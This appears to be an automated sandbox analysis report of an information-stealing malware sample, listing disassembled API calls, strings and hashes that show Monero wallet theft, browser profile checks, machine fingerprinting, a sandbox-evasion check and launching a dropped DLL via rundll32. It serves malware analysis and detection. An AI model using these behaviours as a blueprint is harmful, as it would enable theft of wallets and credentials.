                                                                                                                                                                    • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                    • API String ID: 4174444224-1526165396
                                                                                                                                                                    • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                                                                    • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                                                                                    • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                                                                                    • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                                                                                    APIs
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy
                                                                                                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                    • API String ID: 3722407311-2697854757
                                                                                                                                                                    • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                                    • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                                                                                    • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                                                                                    • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 00401ADC
                                                                                                                                                                      • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                      • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                      • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                      • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                      • Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                                                                                    • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                    • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                    • API String ID: 615783205-3586502688
                                                                                                                                                                    • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                                    • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                                                                                    • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                                                                    • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                      • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                                                                      • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                                                                      • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                                                                      • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                                                                      • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                                                                      • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                                                                      • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                                                                      • Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
                                                                                                                                                                      • Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                    • String ID: LzA
                                                                                                                                                                    • API String ID: 1546541418-1388989900
                                                                                                                                                                    APIs
                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                                                                    • _memset.LIBCMT ref: 0040FBC1
                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                                                                      • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: OpenProcess_memmove_memset
                                                                                                                                                                    • String ID: N0ZWFt
                                                                                                                                                                    • API String ID: 2647191932-431618156
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                    • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                    • String ID: V@
                                                                                                                                                                    • API String ID: 2311089104-383300688
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 00411607
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                    • API String ID: 2235053359-1211650757
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                                                                    Strings
                                                                                                                                                                    • wallet_path, xrefs: 00401A9C
                                                                                                                                                                    • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                    • API String ID: 3466090806-4244082812
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                    • String ID: Windows 11
                                                                                                                                                                    • API String ID: 3466090806-2517555085
                                                                                                                                                                    • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                                    • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                                                                    • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                                                                    • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                    • String ID: CurrentBuildNumber
                                                                                                                                                                    • API String ID: 3466090806-1022791448
                                                                                                                                                                    • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                                    • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                                                                    • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                                                                    • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004156A4
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004156F6
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3891774339-0
                                                                                                                                                                    • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                                    • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                                                                    • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                                                                    • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                                    • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                                    • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 181426013-0
                                                                                                                                                                    • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                                                                    • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                                                                    • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                                                                    • _memset.LIBCMT ref: 004010D0
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                                                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1859398019-0
                                                                                                                                                                    • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                                                                    • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                                                                                    • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                                                                    • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                    • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                    • API String ID: 2215929589-2108736111
                                                                                                                                                                    • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                                    • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                                                                                    • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                                    • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004116CE
                                                                                                                                                                      • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                                      • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                    • API String ID: 2781187439-1654365787
                                                                                                                                                                    • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                                    • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                                                                                    • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                                    • wsprintfA.USER32 ref: 0041117A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                    • String ID: %d MB
                                                                                                                                                                    • API String ID: 3644086013-2651807785
                                                                                                                                                                    • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                                    • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                                                                                    • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                                    • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                                                                                    APIs
